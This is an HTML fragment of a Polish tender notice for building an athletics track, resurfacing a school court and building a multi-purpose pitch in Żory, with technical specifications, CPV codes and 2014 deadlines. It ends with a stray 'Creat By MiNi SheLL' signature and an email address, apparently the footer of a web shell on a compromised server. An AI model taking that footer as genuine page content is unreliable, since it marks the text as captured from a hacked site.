<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa bieżni lekkoatletycznej wraz z zeskokiem przy Zespole Szkolno-Przedszkolnym Nr 9 w Żorach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa bieżni lekkoatletycznej o powierzchni całkowitej 168,00m2:
a)Korytowanie pod bieżnię i zeskok na głębokość ok. 35cm,
b)Wywóz wraz z utylizacją materiałów z korytowania,
c)Wykonanie odcinka drenażu  80 mm z obsypką żwirową w geowłókninie - 80mb,
d)Wykonanie podbudowy przepuszczalnej dla wody pod bieżnię lekkoatletyczną:
-grunt rodzimy,
-warstwa odsączająca z piasku lub pospółki o gr. 10cm,
-warstwa konstrukcyjna z kruszywa kamiennego (fr. 32-63mm) o gr. 10cm,
-warstwa klinująca z kruszywa kamiennego (fr. 0-32mm) o gr. 8cm,
-warstwa wyrównująca z miału kamiennego (fr. 0-4mm) o gr. 4cm,
e)Ułożenie wokół bieżni obrzeży betonowych 8x30cm na ławie betonowej z oporem,
f)Wykonanie nawierzchni poliuretanowej bieżni typu natrysk (kolor ceglasty)
wraz z malowaniem linii (trzy tory) specjalistyczną farbą poliuretanową w kolorze białym - 168,00m2,
g)Wykonanie zeskoku (piaskownica) dla skoku w dal wraz belką do odbicia umieszczoną w bieżni, piaskownica o wymiarach 4,0x8,0m wykonana z elementów 
z tworzywa sztucznego odpornych na warunki atmosferyczne, piaskownica wypełniona drobnym piaskiem płukanym.
Roboty należy wykonać zgodnie ze szczegółowymi specyfikacjami technicznymi (SST)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.12.00-0, 45.11.10.00-8, 45.23.61.10-4, 45.23.21.30-2, 45.23.24.10-9, 45.21.22.21-1, 45.23.32.50-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie nowej nawierzchni poliuretanowej boiska wielofunkcyjnego przy Szkole 					Podstawowej Nr 17 w Żorach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nowa nawierzchnia boiska wielofunkcyjnego o wymiarach 19,1 m x 32,1 m (pole gry 15,1m x 28,1m) o powierzchni całkowitej 613,11 m2:
a)Rozbiórka istniejącej nawierzchni poliuretanowej boiska wielofunkcyjnego,
b)Wywóz wraz z utylizacją materiałów z rozbiórki,
c)Wykonanie odcinka drenażu  80 mm z obsypką żwirową w geowłókninie - 20mb,
d)Wyrównanie istniejącej podbudowy boiska wielofunkcyjnego wraz wykonaniem nowej warstwy wyrównującej z miału kamiennego (fr. 0-4mm) o gr. 4cm,
e)Wykonanie nawierzchni poliuretanowej boiska typu natrysk - 613,11m2,
f)Malowanie linii boisk specjalistyczną farbą poliuretanową - boisko do koszykówki 
i siatkówki. 
Roboty należy wykonać zgodnie ze szczegółowymi specyfikacjami technicznymi (SST)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.21.22.21-1, 45.11.12.00-0, 45.11.10.00-8, 45.23.61.10-4, 45.23.21.30-2, 45.23.24.10-9, 45.23.32.50-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa boiska wielofunkcyjnego przy Gimnazjum Nr 2 w Żorach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa boiska wielofunkcyjnego o powierzchni całkowitej 1210,71m2:
a)	boisko do piłki ręcznej o wymiarach 44,00m x 24,00m (pole gry 40,00m x 20,00m),
b)	boisko do koszykówki o wymiarach 32,10m x 19,10m (pole gry 28,10m x 15,10m),
c)	boisko do siatkówki - pole gry 18,00m x 9,00m,
d)	parametry techniczne boiska wielofunkcyjnego:
-	podbudowa przepuszczalna
-	nawierzchnia boiska - poliuretanowa w technologii typu NATRYSK
-	wokół boiska obrzeża betonowe 8x30cm na ławie betonowej z oporem oddzielające sąsiednie elementy terenu od płyty boiska
-	za bramkami boiska do piłki ręcznej zamontowane w sposób trwały z podłożem piłkochwyty wysokości 6m z siatki polipropylenowej
-	odwodnienie boiska - drenaż podłączony do istniejącej kanalizacji deszczowej,
e)	w trakcie robót związanych z podłączeniem drenażu boiska do istniejącej studni kanalizacji deszczowej uwzględnić konieczność przekładki nawierzchni istniejącego placu z trylinki na podsypce cementowo-piaskowej (powierzchnia około 45,0m2),
f)	w przypadku uszkodzenia w trakcie robót budowlanych związanych z budową boiska wielofunkcyjnego istniejącej nawierzchni bieżni lekkoatletycznej z mączki ceglanej, zlokalizowanej w bezpośrednim sąsiedztwie boiska, należy uwzględnić koniczność naprawy i odtworzenia przedmiotowej nawierzchni bieżni.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej.
Roboty należy wykonać zgodnie z dokumentacją projektową i SST..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.21.22.21-1, 45.11.12.00-0, 45.11.10.00-8, 45.23.61.10-4, 45.23.21.30-2, 45.23.24.10-9, 45.23.32.50-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com